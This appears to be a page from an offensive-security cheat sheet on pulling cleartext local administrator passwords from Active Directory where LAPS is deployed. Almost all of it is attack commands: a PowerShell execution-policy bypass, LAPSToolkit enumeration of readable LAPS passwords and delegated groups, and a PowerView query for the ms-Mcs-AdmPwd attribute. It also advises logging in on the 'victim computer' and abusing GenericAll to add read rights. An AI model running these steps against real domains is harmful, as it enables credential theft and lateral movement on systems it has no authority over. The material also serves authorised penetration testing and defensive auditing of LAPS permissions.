Local Administrator Password Solution (LAPS)

Try gain clear text passwords in AD when LAPS is in use

powershell -ep bypass

Import-Module .\LAPSToolkit.ps1
Get-LAPSComputers

Check LAPS Password Readers group members as below to see who has read permissions in the clear text password from the above

Find-LAPSDelegatedGroups
Get-NetGroupMember -GroupName "LAPS Password Readers"

. .\Powerview.ps1
Get-DomainComputer -Identity {target} -Properties ms-Mcs-AdmPwd

Login to the listed account in victim computer and run the 1st set of commands to see the Password column for the local admin of the corresponding computer hosts.

Can add the right if we have GenericAll.

PreviousWindows Credentials NextSerivce Account Access Token

Last updated 1 year ago